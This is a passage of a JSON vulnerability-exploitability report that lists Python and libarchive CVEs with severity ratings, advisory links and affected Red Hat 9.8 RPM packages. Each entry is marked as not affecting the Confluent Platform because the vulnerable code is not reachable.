          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0"
        },
        {
          "url": "https://github.com/python/cpython/commit/34d76b00dabde81a793bd06dd8ecb057838c4b38"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f396ca9d7bbe2a50ea6b8c9b27c0082884d9f80"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ed11d3cd288e6b90196a15c5a825a45d318fe47"
        },
        {
          "url": "https://github.com/python/cpython/commit/a35ca3be5842505dab74dc0b90b89cde0405017a"
        },
        {
          "url": "https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f"
        },
        {
          "url": "https://github.com/python/cpython/issues/143925"
        },
        {
          "url": "https://github.com/python/cpython/pull/143926"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15282.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15282"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:37:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1632",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1632"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1632"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdunzip-poc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1632"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.296619"
        },
        {
          "url": "https://vuldb.com/?id.296619"
        },
        {
          "url": "https://vuldb.com/?submit.496460"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
        }
      ],
      "published": "2025-02-24T14:15:11+00:00",
      "updated": "2026-06-17T08:39:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1795",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        116
      ],
      "description": "During an address list folding when a separating comma ends up on a folded line and that line is to be unicode-encoded then the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plan comma. This can result in the address header being misinterpreted by some mail servers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1795"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1795"
        },
        {
          "url": "https://github.com/python/cpython/commit/09fab93c3d857496c0bd162797fab816c311ee48"
        },
        {
          "url": "https://github.com/python/cpython/commit/70754d21c288535e86070ca7a6e90dcb670b8593"
        },
        {
          "url": "https://github.com/python/cpython/commit/9148b77e0af91cdacaa7fe3dfac09635c3fe9a74"
        },
        {
          "url": "https://github.com/python/cpython/commit/a4ef689ce670684ec132204b1cd03720c8e0a03d"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4df3c55e4c5513947f907f24766b34d2ae8c090"
        },
        {
          "url": "https://github.com/python/cpython/issues/100884"
        },
        {
          "url": "https://github.com/python/cpython/pull/100885"
        },
        {
          "url": "https://github.com/python/cpython/pull/119099"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00013.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MB62IZMEC3UM6SGHP5LET5JX2Y7H4ZUR/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1795"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
        }
      ],
      "published": "2025-02-28T19:15:36+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
